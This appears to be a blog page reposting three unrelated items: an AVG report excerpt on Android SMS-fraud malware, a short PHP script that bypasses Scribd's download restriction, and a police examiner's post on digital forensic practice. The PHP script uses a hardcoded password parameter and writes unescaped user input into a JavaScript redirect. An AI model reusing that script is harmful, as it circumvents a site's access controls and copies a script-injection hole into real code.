Messaging is where a user is subscribed to receive content and is billed by a third party. The charges can be one-time or recurring. The subscribing processed is being monitored by the cyber criminals.
The user is being charged premium prices, and their phone bill is increasing. The malware can hide these activities from the user by not listing the send/received text messages.
Up until now, the main tactic used by hackers is by uploading malicious application to the Android Market place. Google, for the second time in the past three months, had to remove dozens of malicious applications from the Google market. Some of these apps were pirated legitimate programs that had been modified with malicious code and uploaded to the Google Market.
However, as seen by AVG Threats Labs lately, a phishing method is being used by sending Text messaging or Instant Messaging or Emails with content which tries to lure users into installing malware to their mobile. Cyber Criminals are using Social Engineering tactics when targeting mobile users as done to PC users. Cyber criminals know they can be successful bytargeting the weakest link in the chain, the human part! Social Engineering attacks are more difficult to protect against.
As with the above example, the criminals’ mobile monetization is mainly oming via premium paid services such as SMS Trojans, which send text messages to premium rate numbers or by applications that initiate calls to highly rated numbers.
Mobile malware reached the sophistication and complexity of PC malware. Most mobile malware is using Command & Control to support and to update the malware remotely. This is done to maximize the profit for the criminals. With the C&C, the attacker can monitor any activity performed on the mobile device.
Recommendations
•  Any mobile device should be equipped with security measures. 
•  AVG provides ‘AVG Mobilation’, free software for Android to protect users from such threats
•  Become security aware, expect being a target for criminal activity
•  Be cautious in what you download to your device.
•  Monitor your device activities
•  The most important task is… check your phone bills.

Source: http://avg.typepad.com/files/avg-community-powered-threat-report---q2-2011.pdf

[Lượm] Download mien phi tu Scribd


<?php
function downloadScribd($link){
  $getID = explode("/",str_replace("http://","",$link));
  exit("<script>window.location='
http://www.scribd.com/mobile/documents/".$getID[2]
."/download?commit=
Download+Now&secret_password=K4pT3N';</script>");
 }
 echo "<form name='f' method='post' action=''>
   <input type='text' name='link'>
   <input type='submit' name='submit' value='Download'>
    </form>";
 if(isset($_POST['submit'])){
  downloadScribd($_POST['link']);
 }
?>
 
http://anambaskab.go.id/scribd.php
Source: http://explorecrew.org
All content of this web is for education purphose only. Any 
consequences in views of the use of scripts, techniques, codes, 
tutorials, and everything imaginable on this website are purely the 
responsibility of the user, NOT ExploreCrew. If you agree about this, 
continue reading. If you do not agree, please leave.

[RAT] Muhammad Nuh Al-Azhar

Muhammad Nuh Al-Azhar
I am a forensic cop who often deal with forensic investigation on computer crime and/or computer-related crime. I have been working at Forensic Laboratory Centre (Puslabfor) of Indonesian National Police Headquarters (Mabes Polri) for more than 14 years. With this blog, I would like to share my forensic knowledge I obtained from the CHFI (Computer Hacking Forensic Investigator) at EC-Council, USA and the MSc in Forensic Informatics at the University of Strathclyde, UK, and my experience on dealing with the computer-based electronic evidence. Besides CHFI, I was also awarded professional certification of CEI (Certified EC-Council Instructor) from EC-Council, professional commendation as Senior Instructor on crime scene management from a retired forensic investigator of New York State Police, and MBCS (Professional Member of British Computer Society). I also got the award of 2010 Super Six UK Alumni from British Council - Indonesia. In order to update the IT information and maintain professionalism, I join to be member of EC-Council, Forensic Focus, SANS and BCS (British Computer Society). I hope this blog could be useful for anybody who would like to develop forensic skills.
In the last two weeks, I was requested by some parties to share the knowledge on digital forensic at two different activities. The first is to be keynote speaker on the digital forensic preview seminar conducted by EC-Council Representative for Indonesia (i.e. PT. Datamation) along with PT. Andalan Nusantara Teknologi. This seminar carried out in Jakarta was attended by about sixty people which are Chief Information Officer (CIO) or IT people from different organisations in Indonesia such as Bank Central Asia (BCA), Pertamina, Bina Nusantara University, Indonesian Foreign Affairs Department and so on. The second is to be guest lecturer at University of Indonesia. This is a program of the British Council (i.e. UK Alumni Road Show) performed jointly with Criminology Department of University of Indonesia. This class moderatored by Prof. Adrianus Meliala was attended by about thirty students which actively followed the session of lecturing.

In both moments, I talked about the current development of digital forensic. Following are some core materials delivered:

Investigation flow chart
On this chart, it is explained that computer crime or computer-related crime is investigated in order to solve the case. This investigation is done by applying digital forensic properly. In this case, digital forensic plays some key roles, namely:
- To support and perform scientific crime investigation.
- To carry out forensic analysis on electronic evidence in order to find out digital evidence.
- To be able to describe the link between the perpetrators and their crime.
- To deliver expert testimony at court.


Digital forensic principles
These principles are adopted from ACPO (i.e. Association of Chief Police Officers in the UK) guidelines. It is widely used by digital forensic practitioners in the world. In my point of view, a digital forensic analyst should understand these principles and has to apply it when performing a forensic investigation. Below are the principles quoted from the guidelines.
1. No action taken by law enforcement agencies should change data held on a computer or storage media.
2. The person accessing the data must be competent to do so and able to explain the relevance and implications of the actions taken.
3. An audit trail or record of all processes applied should be created and preserved.
4. The person in charge has overall responsibility to ensure that  these principles are adhered to.

First actions at the scene
When a computer is off, following are some actions which should be taken:
1. Make sure it is switched off and never turn it on.
2. Remove the battery (for notebooks / mobile device) or unplug the end of the power cable attached at CPU first, and then from wall socket (for PCs).
3. For mobile device: if any, never remove SIM cards from the device.
4. Label, document and record it; and then seize it for further analysis.

When a computer is on, the actions would be:
1. Record what is running on the screen.
2. Collect data (e.g. running processes, opened ports, decrypted volumes, etc.). Ensure that changes made to the system are understood.
3. When possible, perform live forensic imaging.
4. Never use the shut down procedure of the OS.
5. Unplug the cable power from CPU first; and then from the wall socket (for PCs) or remove the battery (for notebooks / mobile).
6. Label, document and record it; and then seize it for further analysis.

Digital forensic components
These are components which should be well understood in order to perform digital forensic analysis properly.
1. Qualified Human Resource: Professional digital forensic analyst.
2. Forensic Procedure: Implementation of digital forensic principles.
3. Reliable Hardware: High speed processor, reasonable RAM, USB to IDE cable, write protect, etc.
4. Reliable Software: Forensic applications running under Microsoft Windows and Linux Ubuntu.
5. Management: Solution on budget and non-technical problems.


Digital forensic coverage
Based on the type of the evidence analysed, digital forensic is devided into several categories, namely:
1. Computer Forensic.
2. Cyber & Network Forensic.
3. Mobile Forensic.
4. Audio Forensic.
5. Video & Digital Image Forensic.
6. CD/DVD Forensic.

Anti forensic
It is defined as techniques implemented by perpetrator in order to against digital forensic.The objectives of anti-forensic are:
1. To conceal the case-related information.
2. To obscure the criminal’s involvement.
3. To obstruct the action of digital forensic analyst.


The techniques of anti forensic which are frequently implemented are:
1. Cryptography. It is a method to conceal essential information by deploying cryptography algorithm.
2. Steganography. It is a method to conceal essential information by embedding it into a carrier, so that it is difficult to detect.
3. Wiping. It is a method for securely deletion by overwriting sectors of deleted target.

That's several materials I delivered on both moments. It is a pride for me to be speaker or lecturer in sharing my knowledge and experience on digital forensic to other people. I always look forward to receiving the invitation like these programmes. Hopefully this could be useful for anybody or any organisations that would like to apply digital forensic on the investigation of computer crime or computer-related crime.

Good luck...!
Source: http://forensiccop.blogspot.com